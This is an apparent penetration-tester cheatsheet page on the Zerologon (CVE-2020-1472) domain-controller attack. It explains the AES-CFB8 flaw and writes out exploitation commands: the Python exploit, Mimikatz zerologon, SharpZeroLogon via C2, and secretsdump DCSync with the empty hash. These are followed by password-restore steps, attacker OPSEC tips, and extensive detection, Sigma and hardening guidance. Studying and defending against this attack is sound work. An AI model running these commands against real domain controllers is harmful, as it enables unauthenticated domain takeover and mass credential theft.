daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-40-zerologon-cve-2020-1472.md (22422B)


      1 ---
      2 title: "Attack #40 β€” Zerologon (CVE-2020-1472)"
      3 description: "Zerologon is a critical vulnerability in the Netlogon Remote Protocol (MS-NRPC) that allows an unauthenticated attacker with network access to a DC to set…"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #40 β€” Zerologon (CVE-2020-1472).md"
     11 ---
     12 # πŸ”΅ Attack #40 β€” Zerologon (CVE-2020-1472)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Zerologon is a **critical vulnerability in the [Netlogon Remote Protocol (MS-NRPC)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/)** that allows an **unauthenticated attacker** with network access to a DC to **set the DC machine account password to empty** β€” effectively gaining Domain Admin access. The cryptographic flaw is in the AES-CFB8 initialization vector: by sending all-zero client challenges, there's a 1/256 chance the session key becomes all zeros, which the attacker can predict.
     19 
     20 **CVSS Score: 10.0** β€” Full unauthenticated domain compromise.
     21 
     22 > [!info]+ Technical Deep-Dive β€” AES-CFB8 Cryptographic Flaw
     23 > 1. The [Netlogon protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/) uses **AES-CFB8** mode to compute a session key during the `NetrServerAuthenticate3` handshake between a client and a DC
     24 > 2. In AES-CFB8, the **Initialization Vector (IV)** should be random β€” but the Netlogon implementation uses a **fixed all-zero IV** (`ComputeNetlogonCredential` function)
     25 > 3. When the **client challenge** is also all zeros, the `ComputeNetlogonCredential` function produces an all-zero session credential with probability **1/256** (~0.39%)
     26 > 4. The attacker sends up to 256 authentication attempts with all-zero challenges β€” statistically, one will succeed and produce an all-zero session key
     27 > 5. With the known (all-zero) session key, the attacker calls `NetrServerPasswordSet2` to **set the DC machine account password to empty**
     28 > 6. *The DC machine account (`DC01$`) is now set to an empty password, allowing the attacker to authenticate as the DC and perform DCSync (Attack #37)*
     29 > 7. **Critical**: Setting the DC machine password to empty **breaks AD replication** and trust relationships β€” the password MUST be restored immediately after exploitation
     30 
     31 > [!danger]+ Destructive Attack Warning
     32 > `fas:Skull`
     33 > 1. Zerologon **BREAKS the DC** if the machine password is not restored β€” AD replication, trust relationships, SYSVOL replication, and domain services will fail
     34 > 2. This is a **"break glass" attack** β€” only use in time-constrained engagements with explicit authorization
     35 > 3. **Always restore the DC machine password immediately after exploitation**
     36 > 4. *In a real engagement, have the restore commands ready BEFORE running the exploit*
     37 
     38 ***
     39 
     40 ## βš™οΈ Prerequisites
     41 
     42 | Requirement | Detail |
     43 |---|---|
     44 | **Network access to DC (port 135/445)** | No credentials required β€” fully unauthenticated |
     45 | **DC is unpatched** | Patched in August 2020 ([KB4565349](https://support.microsoft.com/en-us/help/4565349)) |
     46 | **DC hostname known** | Required for the NetBIOS name in the Netlogon handshake |
     47 
     48 ***
     49 
     50 ## πŸ› οΈ Tools
     51 
     52 | Tool | Platform | Version | Notes |
     53 |---|---|---|---|
     54 | [zerologon_tester.py](https://github.com/SecuraBV/CVE-2020-1472) | Linux/Python | Python 3 | Secura's original vulnerability checker β€” safe, non-destructive |
     55 | [cve-2020-1472-exploit.py](https://github.com/dirkjanm/CVE-2020-1472) | Linux/Python | Python 3 | dirkjanm's exploit β€” sets DC machine password to empty |
     56 | [Mimikatz](https://github.com/gentilkiwi/mimikatz) | Windows | β‰₯ 2.2.0 (Sep 2020+) | `lsadump::zerologon` β€” Windows-native exploit |
     57 | [SharpZeroLogon](https://github.com/nccgroup/nccfsas) | Windows (.NET) | Latest | C# exploit for C2 `execute-assembly` β€” NCC Group |
     58 | [Impacket β€” secretsdump.py](https://github.com/fortra/impacket) | Linux | β‰₯ 0.9.22 | DCSync using the emptied DC machine account |
     59 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β‰₯ 1.1.0 | `-M zerologon` vulnerability check module |
     60 | [reinstall.py / restorepassword.py](https://github.com/dirkjanm/CVE-2020-1472) | Linux/Python | Python 3 | Restore the DC machine password after exploitation |
     61 
     62 ***
     63 
     64 ## ⏱️ Time-to-Execute Estimates
     65 
     66 | Operation | Time | Notes |
     67 |---|---|---|
     68 | Vulnerability check | **5–30 seconds** | Up to 256 Netlogon attempts |
     69 | Exploit (set password to empty) | **5–30 seconds** | Same 1/256 probability, ~2000 attempts max |
     70 | DCSync with empty hash | **10–60 seconds** | Standard DCSync timing |
     71 | Password restore | **5–15 seconds** | Critical β€” must be done immediately |
     72 | **Total attack chain** | **30–120 seconds** | From unauthenticated β†’ full domain compromise |
     73 
     74 ***
     75 
     76 ## πŸ’» Full Commands
     77 
     78 ### πŸ”΅ Check Vulnerability
     79 
     80 ```bash
     81 # ── zerologon_tester.py (safe β€” does NOT exploit) ────────────────────────────
     82 python3 zerologon_tester.py DC01 10.10.10.10
     83 # Output: "DC01 is VULNERABLE" or "not vulnerable"
     84 
     85 # ── NetExec module (also safe) ────────────────────────────────────────────────
     86 nxc smb DC01.corp.local -u '' -p '' -M zerologon
     87 # Output: [+] VULNERABLE or [-] not vulnerable
     88 ```
     89 
     90 ### πŸ”΄ Exploit β€” Set DC Password to Empty
     91 
     92 ```bash
     93 # ── dirkjanm exploit (Linux) ─────────────────────────────────────────────────
     94 python3 cve-2020-1472-exploit.py DC01 10.10.10.10
     95 # Sets DC01$ machine account password to empty string
     96 # ⚠️ WARNING: This BREAKS the DC β€” restore password immediately after DCSync
     97 
     98 # ── DCSync with empty password ────────────────────────────────────────────────
     99 secretsdump.py -just-dc-user krbtgt corp.local/'DC01$'@DC01.corp.local \
    100   -hashes :31d6cfe0d16ae931b73c59d7e0c089c0
    101 # 31d6cfe0d16ae931b73c59d7e0c089c0 = empty password NT hash
    102 
    103 # ── Dump all hashes ───────────────────────────────────────────────────────────
    104 secretsdump.py corp.local/'DC01$'@DC01.corp.local \
    105   -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc -outputfile zerologon_dump
    106 
    107 # ── Dump Administrator hash specifically (for next steps) ─────────────────────
    108 secretsdump.py corp.local/'DC01$'@DC01.corp.local \
    109   -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 \
    110   -just-dc-user Administrator
    111 ```
    112 
    113 #### Mimikatz (Windows)
    114 
    115 ```powershell
    116 # ── Mimikatz zerologon exploit ────────────────────────────────────────────────
    117 privilege::debug
    118 lsadump::zerologon /target:DC01.corp.local /account:DC01$
    119 # Exploits CVE-2020-1472 and sets machine password to empty
    120 
    121 # ── Then DCSync with the zeroed credentials ───────────────────────────────────
    122 lsadump::dcsync /domain:corp.local /dc:DC01.corp.local /user:krbtgt /authuser:DC01$ /authdomain:corp.local /authpassword:"" /authntlm
    123 ```
    124 
    125 #### SharpZeroLogon (C# β€” for C2)
    126 
    127 ```powershell
    128 # ── Via Cobalt Strike / Sliver ────────────────────────────────────────────────
    129 execute-assembly /path/to/SharpZeroLogon.exe DC01.corp.local
    130 # Exploits and dumps the DC machine account hash
    131 ```
    132 
    133 ### πŸ”΄ Restore DC Password (CRITICAL β€” Must Do)
    134 
    135 ```bash
    136 # ── Step 1: Get the original DC machine password hash from the dump ───────────
    137 # Look for DC01$ in the zerologon_dump.ntds file:
    138 # corp.local\DC01$:1001:aad3b435b51404eeaad3b435b51404ee:<ORIGINAL_HASH>:::
    139 
    140 # ── Step 2: Get Administrator hash for authentication ─────────────────────────
    141 secretsdump.py corp.local/Administrator@DC01.corp.local \
    142   -hashes :<admin_NT_hash> -just-dc-user 'DC01$'
    143 
    144 # ── Step 3: Restore DC machine password ───────────────────────────────────────
    145 python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.10 \
    146   -hexpass <original_hex_password>
    147 
    148 # ── Alternative: reinstall.py ─────────────────────────────────────────────────
    149 python3 reinstall.py DC01 -target-ip 10.10.10.10 \
    150   -hexhash <original_dc_hash>
    151 
    152 # ── Verify restoration ────────────────────────────────────────────────────────
    153 # Try to authenticate as DC01$ with the original hash:
    154 nxc smb DC01.corp.local -u 'DC01$' -H <original_dc_hash>
    155 # Should succeed β†’ password restored
    156 
    157 # ⚠️ WARNING: If DC password is not restored, AD replication will BREAK
    158 # The DC will lose trust relationship with other DCs
    159 ```
    160 
    161 > [!danger]+ Password Restoration is NOT Optional
    162 > `fas:Skull`
    163 > 1. Failing to restore the DC machine password will cause: **AD replication failure**, **trust relationship breakage**, **SYSVOL replication failure**, **Group Policy processing failure**
    164 > 2. The restoration must happen **within minutes** β€” the longer you wait, the more damage occurs as other DCs try to replicate
    165 > 3. If restoration fails, the only recovery option may be **restoring the DC from backup**
    166 > 4. *Always have the restore commands prepared and tested BEFORE exploiting Zerologon*
    167 
    168 ***
    169 
    170 ## 🎯 OPSEC Tips
    171 
    172 1. **Zerologon BREAKS the DC** if password is not restored β€” replication, trust relationships, and services will fail
    173 2. **This is a "break glass" attack** β€” only use if you're in a time-constrained engagement
    174 3. **Patched since August 2020** β€” but legacy DCs may still be vulnerable
    175 4. **Always restore the DC password after exploitation**
    176 5. **The exploit generates ~256 failed authentication attempts** β€” these are logged as Event 5805 (Netlogon authentication failure) and are highly anomalous
    177 6. **Execute and restore within 2–3 minutes** β€” minimize the window where the DC has an empty password
    178 7. **Test the restore procedure first** on a lab environment β€” a failed restore in production is catastrophic
    179 
    180 ### πŸ“Š OpSec Ranking
    181 
    182 | Method | Stealth | Speed | Reliability | Notes |
    183 |---|---|---|---|---|
    184 | dirkjanm Python exploit | πŸ”΄ Low | 🟒 Fast | 🟒 High | 256 failed auth attempts are very noisy |
    185 | Mimikatz zerologon | πŸ”΄ Low | 🟒 Fast | 🟒 High | Same noise + Mimikatz on disk |
    186 | SharpZeroLogon | πŸ”΄ Low | 🟒 Fast | 🟑 Medium | In-memory but still generates Netlogon noise |
    187 
    188 > [!warning]+ Noise Profile
    189 > `fas:TriangleExclamation`
    190 > 1. Zerologon is **extremely noisy** β€” up to 2000 Netlogon authentication attempts in seconds
    191 > 2. Any environment with basic Netlogon monitoring will detect this immediately
    192 > 3. The attack is not stealthy and should only be used as a last resort or in time-constrained CTF/exam scenarios
    193 > 4. *If stealth matters, prefer other escalation paths like Kerberoasting (Attack #2) or ACL abuse (Attack #65)*
    194 
    195 ***
    196 
    197 ## πŸ›‘οΈ Detection β€” Event IDs
    198 
    199 | Event ID | Source | What to Look For |
    200 |---|---|---|
    201 | **4742** | Security Log (DC) | Computer account password change (DC01$ password set) |
    202 | **5805** | System Log (DC) | Netlogon authentication failure (from exploit attempts β€” expect 100+ in seconds) |
    203 | **4624** | Security Log (DC) | Logon with nullified DC credentials (Type 3 with DC01$ account) |
    204 | **5829** | System Log (DC) | Vulnerable Netlogon secure channel connection allowed (post-patch, if enforcement not enabled) |
    205 
    206 ### πŸ”Ž Sigma Rules
    207 
    208 ```yaml
    209 # ── SigmaHQ β€” Zerologon Exploitation Attempt ─────────────────────────────────
    210 title: Zerologon (CVE-2020-1472) Exploitation Attempt
    211 id: b1e5a3f0-7c52-4f3a-9e0a-3b4c5d6e7f8a
    212 status: stable
    213 logsource:
    214   product: windows
    215   service: system
    216 detection:
    217   selection:
    218     EventID: 5805
    219   timeframe: 1m
    220   condition: selection | count() > 50
    221 level: critical
    222 tags:
    223   - attack.privilege_escalation
    224   - attack.t1210
    225   - cve.2020.1472
    226 ```
    227 
    228 ```yaml
    229 # ── SigmaHQ β€” DC Machine Account Password Change ─────────────────────────────
    230 title: DC Machine Account Password Reset (Zerologon Indicator)
    231 id: a2b3c4d5-zerologon-dc-password-change
    232 logsource:
    233   product: windows
    234   service: security
    235 detection:
    236   selection:
    237     EventID: 4742
    238     TargetUserName|endswith: '$'
    239   keywords:
    240     PasswordLastSet: '*'
    241   condition: selection
    242 level: high
    243 ```
    244 
    245 ### πŸ›‘οΈ EDR-Specific Detections
    246 
    247 > [!warning]+ Microsoft Defender for Identity (MDI)
    248 > 1. **"Suspected Zerologon exploitation (CVE-2020-1472)"** β€” high-fidelity alert triggered by anomalous Netlogon authentication patterns
    249 > 2. MDI detects the characteristic burst of failed Netlogon authentications followed by a successful authentication with an all-zero session key
    250 > 3. **Immediate alert** β€” MDI classifies this as critical severity with automatic incident creation
    251 
    252 > [!warning]+ CrowdStrike Falcon
    253 > 1. **"Zerologon Exploitation Detected"** β€” network-level detection for MS-NRPC manipulation
    254 > 2. Falcon correlates Netlogon RPC traffic patterns with CVE-2020-1472 signatures
    255 > 3. Process tree analysis for exploit tools (Python scripts, SharpZeroLogon)
    256 
    257 > [!warning]+ Elastic Security
    258 > 1. Rule: **"Potential Zerologon Attack (CVE-2020-1472)"** β€” detects burst of Event 5805 entries
    259 > 2. Rule: **"DC Machine Account Password Change"** β€” correlates Event 4742 with DC machine accounts
    260 > 3. *Requires Windows Event Forwarding of System and Security logs from DCs*
    261 
    262 ***
    263 
    264 ## πŸ”¬ Forensic Artifacts
    265 
    266 | Artifact | Location | Details |
    267 |---|---|---|
    268 | **Event 5805 burst** | DC System Log | 100–2000+ Netlogon authentication failures in a few seconds β€” pathognomonic for Zerologon |
    269 | **Event 4742** | DC Security Log | DC machine account password change β€” timestamp marks exploitation |
    270 | **Event 4624** | DC Security Log | Network logon with DC01$ using empty/zeroed credentials |
    271 | **Event 5829** | DC System Log | Post-patch: vulnerable Netlogon connection allowed (if enforcement not enabled) |
    272 | **Network capture** | PCAP | MS-NRPC `NetrServerAuthenticate3` calls with all-zero client challenges; `NetrServerPasswordSet2` call |
    273 | **AD attribute** | `pwdLastSet` on DC$ account | Timestamp of password change β€” matches exploitation time |
    274 
    275 ***
    276 
    277 > [!important]+ Windows Server Version & Patch Timeline
    278 > 1. **August 2020**: Initial patch released (KB4565349 for Server 2012 R2/2016/2019) β€” "Phase 1" allows vulnerable connections with Event 5829 warning
    279 > 2. **February 2021**: "Phase 2" enforcement β€” DCs reject vulnerable Netlogon connections by default (registry `FullSecureChannelProtection = 1`)
    280 > 3. **Server 2012 R2**: Vulnerable if unpatched; patch available but may not be installed on legacy systems
    281 > 4. **Server 2016**: Vulnerable if unpatched; check `FullSecureChannelProtection` registry key
    282 > 5. **Server 2019**: Vulnerable if unpatched; same patch timeline
    283 > 6. **Server 2022**: Shipped with the fix included β€” NOT vulnerable out of the box
    284 > 7. **Server 2025**: NOT vulnerable β€” Netlogon secure channel enforcement is default
    285 > 8. *In practice, Zerologon is only exploitable on DCs that have been unpatched for 3+ years β€” but legacy environments still exist*
    286 
    287 ***
    288 
    289 ## πŸ”’ Hardening & Prevention
    290 
    291 ```powershell
    292 # ── 1. Verify patch is installed ──────────────────────────────────────────────
    293 Get-HotFix | Where-Object { $_.HotFixID -match 'KB4565349|KB4571694|KB4577015|KB4580325' }
    294 # If empty, the DC is potentially vulnerable β€” patch immediately
    295 
    296 # ── 2. Enable enforcement mode (block vulnerable connections) ─────────────────
    297 # Registry key (should be set after Feb 2021 update):
    298 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" `
    299   -Name "FullSecureChannelProtection" -Value 1 -Type DWord
    300 # Value 1 = enforce secure channel (reject vulnerable connections)
    301 # Value 0 = allow vulnerable connections (NOT recommended)
    302 
    303 # ── 3. Monitor for vulnerable Netlogon connections (Event 5829) ───────────────
    304 # After patching but before enforcement, monitor Event 5829:
    305 # This event indicates a device connected using a vulnerable Netlogon secure channel
    306 # Identify and update/patch these devices before enabling enforcement
    307 
    308 # ── 4. GPO β€” Deploy patch and enforcement domain-wide ─────────────────────────
    309 # Computer Configuration β†’ Policies β†’ Admin Templates β†’ System β†’ Netlogon β†’
    310 #   βœ… "Enforce use of secure RPC for Netlogon secure channel connections" = Enabled
    311 
    312 # ── 5. Monitor Netlogon authentication failures ──────────────────────────────
    313 # Alert on Event 5805 burst: >50 events in 60 seconds = Zerologon attempt
    314 # Configure SIEM alert:
    315 # source=WinEventLog:System EventCode=5805 | timechart span=1m count | where count > 50
    316 
    317 # ── 6. Network-level mitigation ──────────────────────────────────────────────
    318 # Block port 135/445 access to DCs from untrusted network segments
    319 # Only allow domain-joined machines and admin workstations to reach DC RPC ports
    320 
    321 # ── 7. Upgrade legacy DCs ────────────────────────────────────────────────────
    322 # Server 2008/2008 R2 reached end-of-life and DOES have a Zerologon patch,
    323 # but upgrading to Server 2019+ is strongly recommended
    324 ```
    325 
    326 ***
    327 
    328 ## 🧩 Troubleshooting
    329 
    330 | Error | Cause | Fix |
    331 |---|---|---|
    332 | `DC01 is NOT VULNERABLE` | DC is patched or enforcement mode is enabled | Verify patch status; check `FullSecureChannelProtection` registry; look for other attack paths |
    333 | Exploit succeeds but DCSync fails | Empty password hash is wrong or DC has additional auth requirements | Use exact hash `31d6cfe0d16ae931b73c59d7e0c089c0` (empty NT hash); ensure you're using `DC01$` (with dollar sign) |
    334 | `STATUS_ACCESS_DENIED` on secretsdump | Authentication issue after password reset | Verify you're authenticating as `DC01$` (machine account, not `DC01` user); use `-hashes :31d6cfe0...` syntax |
    335 | Password restore fails | Original hex password not available or connection issues | Extract `DC01$` hash from the DCSync dump BEFORE restoring; if lost, may need DC restore from backup |
    336 | AD replication broken after exploit | DC machine password was empty too long; trust relationships broken | Restore password immediately; if replication doesn't recover, run `repadmin /syncall /AeD`; worst case: demote and re-promote the DC |
    337 | Exploit hangs / no response | Firewall blocking MS-NRPC traffic or wrong IP | Verify TCP 135/445 connectivity to DC; ensure target IP is the DC, not a load balancer |
    338 | Multiple DCs in domain β€” which to target? | Need to target a specific DC | Choose the PDC Emulator (owns FSMO roles): `nxc smb DC01 -u '' -p '' -M zerologon`; or try each DC |
    339 | Post-patch: Event 5829 appearing | Legacy devices using vulnerable Netlogon connections | Identify and update the device shown in Event 5829 before enabling enforcement mode |
    340 
    341 ***
    342 
    343 ## πŸ—ΊοΈ MITRE ATT&CK
    344 
    345 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    346 |---|---|---|---|---|
    347 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Exploit CVE-2020-1472 to reset DC machine password and gain DA-equivalent access | [MERCURY/MuddyWater](https://attack.mitre.org/groups/G0069/), [DEV-0537 (LAPSUS$)](https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/) |
    348 | **Lateral Movement** | [T1210](https://attack.mitre.org/techniques/T1210/) | Exploitation of Remote Services | Unauthenticated exploitation of MS-NRPC to compromise the Domain Controller | Iranian APT groups, ransomware operators |
    349 | **Credential Access** | [T1003](https://attack.mitre.org/techniques/T1003/) | [.006 β€” DCSync](https://attack.mitre.org/techniques/T1003/006/) | After zeroing DC password, perform DCSync to extract all domain credentials | Chained technique |
    350 
    351 > [!tip]+ Real-World APT Usage
    352 > `fas:Lightbulb`
    353 > 1. **MERCURY/MuddyWater (Iranian APT)** β€” Used Zerologon in 2020-2021 campaigns against government and telecom targets
    354 > 2. **LAPSUS$ (DEV-0537)** β€” Leveraged Zerologon against legacy DCs in high-profile breaches of major tech companies
    355 > 3. **Multiple ransomware groups** (Ryuk, Conti, LockBit) incorporated Zerologon into automated domain compromise playbooks β€” if DC is unpatched, exploit β†’ DCSync β†’ deploy ransomware
    356 > 4. *CISA issued Emergency Directive 20-04 requiring all federal agencies to patch Zerologon within 4 days β€” an unprecedented urgency level*
    357 
    358 ***
    359 
    360 ## πŸ”— Attack Chain Context
    361 
    362 ```
    363 [Zerologon] ──→ Unauthenticated Domain Compromise
    364          β”‚
    365          β”œβ”€β”€β†’ πŸ’₯ CVE-2020-1472 β€” CVSS 10.0
    366          β”œβ”€β”€β†’ πŸ”“ No creds needed β†’ set DC password to null β†’ DCSync (Attack #37)
    367          β”œβ”€β”€β†’ 🎫 DCSync KRBTGT β†’ Golden Ticket (Attack #11)
    368          β”œβ”€β”€β†’ πŸ’» DCSync Administrator β†’ Pass-the-Hash (Attack #4)
    369          β”œβ”€β”€β†’ ⚠️ DESTRUCTIVE β€” must restore DC password immediately
    370          β”œβ”€β”€β†’ πŸ”— Compare: noPAC (Attack #44) β€” also low-priv β†’ DA, but requires auth
    371          └──→ πŸ’€ Defeated by: August 2020 patches, enforce secure channel signing
    372 ```
    373 
    374 ***
    375 
    376 > βœ… **Attack #40 β€” Zerologon complete.**